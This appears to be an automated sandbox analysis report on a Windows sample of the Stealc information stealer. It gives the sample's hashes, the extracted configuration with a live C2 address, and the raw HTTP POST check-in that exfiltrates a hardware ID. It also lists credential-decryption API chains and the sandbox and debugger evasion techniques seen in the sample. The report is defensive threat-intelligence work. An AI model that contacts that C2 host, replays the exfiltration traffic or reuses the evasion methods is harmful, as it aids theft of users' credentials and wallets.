
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1522481
MD5: f74ed5926c551ea89e49d964e729e736
SHA1: 115d45e11d815a3773f95b401ac64711c3a3e99c
SHA256: c978352670126322d013cb1afb3b8ce7bfcc1f0a39765f5dead460dc7f608717
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 6996 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F74ED5926C551EA89E49D964E729E736)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings whose development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, as well as other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches (Source | Rule | Description | Author | Strings)
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security

Yara matches (Source | Rule | Description | Author | Strings)
00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.1659012750.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1699870972.000000000113E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 6996 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 6996 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Yara matches (Source | Rule | Description | Author | Strings)
0.2.file.exe.5e0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol)
2024-09-30T08:57:57.444979+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP

                AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: 0.2.file.exe.5e0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: http://185.215.113.37/ws | Virustotal: Detection: 16%
Source: file.exe | Virustotal: Detection: 41%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005EC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005E7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005E9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005E9B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005EDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005EE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005EED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005EBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005EDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005E16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005EF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.37 | Connection: Keep-Alive | Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFCHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 44 37 41 44 44 37 30 35 45 37 46 32 31 34 38 37 37 32 38 38 37 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 2d 2d 0d 0a Data Ascii: ------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="hwid"CD7ADD705E7F2148772887------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="build"doma------EGDGIIJJECFIDHJJKKFC--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005E6280 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.37 | Connection: Keep-Alive | Cache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFCHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 44 37 41 44 44 37 30 35 45 37 46 32 31 34 38 37 37 32 38 38 37 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 2d 2d 0d 0a Data Ascii: ------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="hwid"CD7ADD705E7F2148772887------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="build"doma------EGDGIIJJECFIDHJJKKFC--
Source: file.exe, 00000000.00000002.1699870972.000000000113E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1699870972.00000000011B2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1699870972.0000000001196000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1699870972.00000000011B2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1699870972.0000000001196000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1699870972.0000000001196000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpLI
Source: file.exe, 00000000.00000002.1699870972.0000000001196000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpTI
Source: file.exe, 00000000.00000002.1699870972.0000000001196000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpXI
Source: file.exe, 00000000.00000002.1699870972.0000000001196000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws

                System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4097
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00901083
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008778F4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009CF130
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009B312B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009AEA3B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009AAB7F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009AFCB5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A7C09
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009AC597
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A2D7F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0099EF15
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 005E45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: xxhfjhyx ZLIB complexity 0.9949629934210527
Source: file.exe, 00000000.00000002.1699280590.00000000005E1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1659012750.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\3PF0Q0DR.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | Virustotal: Detection: 41%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1868800 > 1048576
Source: file.exe | Static PE information: Raw size of xxhfjhyx is bigger than: 0x100000 < 0x1a2000

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.5e0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xxhfjhyx:EW;wyglidst:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xxhfjhyx:EW;wyglidst:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1d779e should be: 0x1cc351
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: xxhfjhyx
Source: file.exe | Static PE information: section name: wyglidst
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008424E3 push eax; mov dword ptr [esp], ebp | 0_2_00843081
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4097 push eax; mov dword ptr [esp], ecx | 0_2_009A409C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4097 push ebx; mov dword ptr [esp], ebp | 0_2_009A410A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4097 push ebp; mov dword ptr [esp], 00000000h | 0_2_009A41B1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4097 push eax; mov dword ptr [esp], ecx | 0_2_009A41D2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4097 push 3F9657F0h; mov dword ptr [esp], edx | 0_2_009A4246
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4097 push eax; mov dword ptr [esp], esi | 0_2_009A42BE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4097 push 7F6A7E3Fh; mov dword ptr [esp], ecx | 0_2_009A42FA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4097 push 65842D1Eh; mov dword ptr [esp], ecx | 0_2_009A430F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4097 push eax; mov dword ptr [esp], ebx | 0_2_009A4372
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4097 push ebp; mov dword ptr [esp], esi | 0_2_009A4439
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4097 push 3ACBF577h; mov dword ptr [esp], esi | 0_2_009A4464
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4097 push ebx; mov dword ptr [esp], esi | 0_2_009A44B5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4097 push ebp; mov dword ptr [esp], ecx | 0_2_009A44E1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4097 push 3746E57Bh; mov dword ptr [esp], eax | 0_2_009A44E9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4097 push 3A6A8B04h; mov dword ptr [esp], edx | 0_2_009A457C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4097 push 685F4E86h; mov dword ptr [esp], edi | 0_2_009A458F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4097 push ebx; mov dword ptr [esp], 2B5B7000h | 0_2_009A4593
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4097 push 0B66EDBCh; mov dword ptr [esp], esi | 0_2_009A460C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4097 push 2DD5F368h; mov dword ptr [esp], ebp | 0_2_009A465E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4097 push 28BA6B96h; mov dword ptr [esp], ecx | 0_2_009A46D4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4097 push 2FC994B9h; mov dword ptr [esp], ebx | 0_2_009A4706
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4097 push 3B8B58E3h; mov dword ptr [esp], edx | 0_2_009A476E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4097 push 5F4CFEE7h; mov dword ptr [esp], eax | 0_2_009A4777
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4097 push ebp; mov dword ptr [esp], 3F446FD1h | 0_2_009A477B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4097 push 6C925936h; mov dword ptr [esp], eax | 0_2_009A4831
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4097 push 52BCE630h; mov dword ptr [esp], ecx | 0_2_009A48A5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4097 push 145A81CCh; mov dword ptr [esp], ebp | 0_2_009A48CC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4097 push 11260941h; mov dword ptr [esp], edx | 0_2_009A48E9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4097 push esi; mov dword ptr [esp], eax | 0_2_009A4910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A4097 push 20C63A96h; mov dword ptr [esp], ebx | 0_2_009A4959
Source: file.exe | Static PE information: section name: xxhfjhyx entropy: 7.954667579008987

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9B7D63 second address: 9B7D67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9B7D67 second address: 9B7D7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F74491B01D6h 0x00000009 pushad 0x0000000a popad 0x0000000b jc 00007F74491B01D6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9B7EC4 second address: 9B7ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9B7ECB second address: 9B7EFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F74491B01E3h 0x00000008 push esi 0x00000009 pop esi 0x0000000a jc 00007F74491B01D6h 0x00000010 jns 00007F74491B01D6h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a je 00007F74491B01D8h 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9B803A second address: 9B8040 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9B81A2 second address: 9B81AE instructions: 0x00000000 rdtsc 0x00000002 jo 00007F74491B01D6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9B81AE second address: 9B81C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7448D39FFDh 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9B8347 second address: 9B834F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9BA762 second address: 9BA76B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9BAB6B second address: 9BAB8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F74491B01E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push esi 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9BAB8F second address: 9BABAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pop eax 0x00000007 stc 0x00000008 lea ebx, dword ptr [ebp+1244C683h] 0x0000000e sub dh, 00000051h 0x00000011 push eax 0x00000012 jo 00007F7448D3A000h 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9DA639 second address: 9DA665 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F74491B01E2h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 jmp 00007F74491B01DDh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9DA665 second address: 9DA671 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F7448D39FF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9DA8E2 second address: 9DA8E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
